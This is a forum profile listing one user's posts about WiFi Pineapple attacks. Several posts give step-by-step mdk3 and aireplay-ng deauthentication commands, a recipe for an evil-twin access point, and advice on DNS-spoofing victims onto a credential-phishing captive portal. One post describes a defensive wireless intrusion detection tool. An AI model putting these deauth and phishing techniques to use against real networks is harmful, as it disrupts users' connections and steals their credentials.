Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Everything posted by NullNull

  1. dnsspoof infusion creates that file. Also creates /www//library/test/success.html for iOS 6 or oldest versions for the same reason. The infusion has an option not to create those files
  2. Try searching "tango mode" in the forums ;)
  3. TYTecholust this is correct! I just want to add some details... At the black.list you can add as many APs as you like. The format of the file should be this: root@kiatogs:~# cat black.list CC:1A:FA:9F:3D:14 C1:F4:56:7A:23:35 38:22:FF:A2:65:F1 root@kiatogs:~# If the APs you want to deauth (and their bssids are in the black.list) are on different channels you can use: mdk3 mon0 d -c 1,6,11,13 -b black.list This command will use interface mon0 and the mdk3 will search for the bssids that are in the black.list at the channels 1, 6, 11 and 13. If -c parameter is not declared mdk3 will hop in all channels to find those bssids. You can find out more by typing: mdk3 --fullhelp or: man mdk3
  4. From https://www.wifipineapple.com Dual unlocked high gain radios emphasize the strengths of two chips infamous for their hacking potential; the AR9331 and the RTL8187. SMA connectors for professional antennas From www.google.com: https://www.google.gr/search?q=which+wifi+antenna+to+choose&oq=witch+wifi+antena&aqs=chrome.2.69i57j0l5.35140j0j7&sourceid=chrome&es_sm=121&ie=UTF-8
  5. Maybe you are mistaking it with something else Step 1 Configure your AP to have exactly the same SSID ENCRYPTION and PASSKEY as the root AP BUT different channel. The channel of your AP should be at least 3 channels away from the root AP. (e.g if the root AP channel is 11 your's should be maximum 7, i would had set it as 1). Step 2 To deauth clients from the root AP you will need a second wireless card (e.g wlan1) and use aireplay-ng or mdk3 deauth mode. I suggest mdk3. If you do not run any deauth attack use the same channel as the root AP. In this case new clients will connect to AP with better/stronger signal quality/strength and the already connected clients will stay connected to root AP. Run this to install mdk3 opkg update opkg install mdk3 and this to see mdk3 options mdk3 --fullhelp to run the deauth attack with mdk3 run: ifconfig wlan1 down airmon-ng start wlan1 echo {root_ap_bssid} > black.list mdk3 {monitor_int} d -c {root_ap_channel} -b black.list (replace {root_ap_bssid}, {monitor_int} and {root_ap channel}) If you still want to use aireplay-ng and deauth every client from the root AP run: ifconfig wlan1 down iwconfig wlan1 channel {root_ap_channel} airmon-ng start wlan1 aireplay-ng -0 100 -a {root_ap_bssid} {monitor_int} (replace {root_ap_channel}, {root_ap_bssid} and {monitor_int}) Else if you want to deaut only one client run: ifconfig wlan1 down iwconfig wlan1 channel {root_ap_channel} airmon-ng start wlan1 aireplay-ng -0 100 -a {root_ap_bssid} -c {client_bssid} {monitor_int} (replace {root_ap_channel}, {root_ap_bssid}, {client_bssid} and {monitor_int})
  6. No. This url is used to redirect the client to the "real internet" when has successfully loged in to the captive portal. You need to setup your phishing page at /etc/nodogsplash/splash.html 1) Do a google search on how captive portals and nodogsplash work 2) Use newbi3 infusion called Evil Portal. FIY: I guess you are using php for logging credentials. nodogsplash does not support php. again newbi3 channel on youtube an some of his topics here will help you "overcome" it.
  7. Hello everyone, so i am playing with my pineapple the last few days trying to make a captive portal. I noticed that nodogsplash only redirects traffic when the pineapple has internet connection. Also because of that, the psedo-browser iOS 6 and 7 (and now android 4.4) are using to detect captive portals is not poping up. Actually this is what i want... to make this pop-up browser to appear every time one of those O.S are connecting but with out having my pineapple connected to the internet... It has something to do with the way nodogsplash sets up iptables ( i think ).. If everyone has something to suggest i would appreciate it :)
  8. Description Wireless IDS is an open source tool written in Python and work on Linux environment. This tool may be useful to those penetration testers, trainers and for those who interest and want to know more about wireless hacking..WIDs will sniff your surrounding air traffic for suspicious activities such as WEP/WPA/WPS attacking packets. It do the following Detect mass deauthentication sent to client / access point which unreasonable amount indicate possible WPA attack for handshakes. Continual sending data to access point using broadcast MAC address which indicate a possibility of WEP attacks Unreasonable amount of communication between wireless client and access point using EAP authentication which indicate the possibility of WPS bruteforce attack by Reaver / WPSCrack Detection of changes in connection to anther access point which may have the possibility of connection to Rogue AP (User needs to assess the situation whether similar AP name) Newly Added Features !!! Display similar Access Point's name (SSID) which could have the possibility of WiFi 'Evil Twins'. Display of probing SSID by wireless devices Detection of Korek Chopchop packets sent by Aircrack-NG (WEP attacks) Detection of Fragmentation PRGA packets sent by Aircrack-NG (WEP attacks) Detection of possible WPA Downgrade attack by MDK3 Detection of possible Michael Shutdown exploitation (TKIP) by MDK3 Detection of Beacon flooding by MDK3 Detection of possible Authentication DoS by MDK3 Detection of possible association flooding Detection of WPA Migration Attack by Aircrack-NG (WPA Attack) Allow logging of events to file. Allow disabling of displaying of probing devices Wireless devices / Access point's manufacturer Identification basing on the MAC OUI database. Pictures Links http://syworks.blogspot.gr/ https://github.com/SYWorks/wireless-ids https://www.facebook.com/syworks
  9. The app will get a successful connection and nothing will change. Just tested!!
  10. Yes, you are correct! Many apps (eg Facebook app) are using https. I never use this method with my pineapple connected to the internet and none of the traffic pases through those apps so i forgot this detail.
  11. Neither of this will work. This apps are encrypting their data wich makes Man In The Middle Attacks pointless. In my expirience this seems the only way. Spoofing all traffic ( *) will not let the app connect to it's servers wich will lead the app to show a "No Internet Connection"(even if the pineapple IS connected). After that 80% of the victims will try to use their browsers to check the internet connection and there is where your phishing page will appear. F.Y.I Apple devices check for internet connection every time they connect to a network. If there is a captive portal in this network (or you are spoofing all traffic to your phishing page) a pseydo-browser will pop-up and wont let the user do anything else (including using any of this apps) until it gets through the captive portal (or your phishing page by entering their credentials).
  12. Try to disable wireless from UI and then run airmon-ng start wlan1 airodump-ng mon0
  13. This will only work when cracking WEP, for WPA all packets need to be captured in order to have a successfull 4-way-handshake.
  14. if you type at your url bar and dnsspoof is running with *facebook.com will redirect the traffic?? :/
  15. You can Lookup facebook ip and redirect the "client" to that ip. But i do not think dnsspoof will redirect https trafic even with the sslstrip at the first place!
  16. You want to change the mac of another access point? :/
  17. I dont think that it has to be part of the firmware because people that are using a captive protal DO want that pseudo-browser to pop-up. I posted it here because dnsspoof infusion already has an option of installing " Fake captive portal files " (for iOS and Windows)
  18. Until iOS 6 Apple's devices were just looking at .../library/test/success.html to check internet connection. Creating the same html file at /www/library/test/ it was easy to fool the device that it have internet connection BUT since iOS 7 is out this will not do the trick. iDevices are now cheking for internet connection using a list that contains over 200 servers. Here is a link with the solution for devices using lighttpd. http://forum.daviddarts.com/read.php?9,8879,8910#msg-8910 Pineapple is using uhttpd. Mayde whistlemaster can do some of his magic ;).
  19. i was playing with my pineapple (fw 3.0) after a long time and i was having some problems with the autostart feature. After some digging it turns out there is a wrong filepath at /pineapple/components/infusions/dnsspoof/includes/autostart.sh Original: dnsspoof -i br-lan -f /pineapple/config/spoofhost > /dev/null 2> ${MYPATH}log/output_${MYTIME}.log & Correct: dnsspoof -i br-lan -f /etc/pineapple/spoofhost > /dev/null 2 > ${MYPATH}log/output_${MYTIME}.log & It's very wierd that no one noticed after such a long time! Is 1.1 the latest version? :/
  • Create New...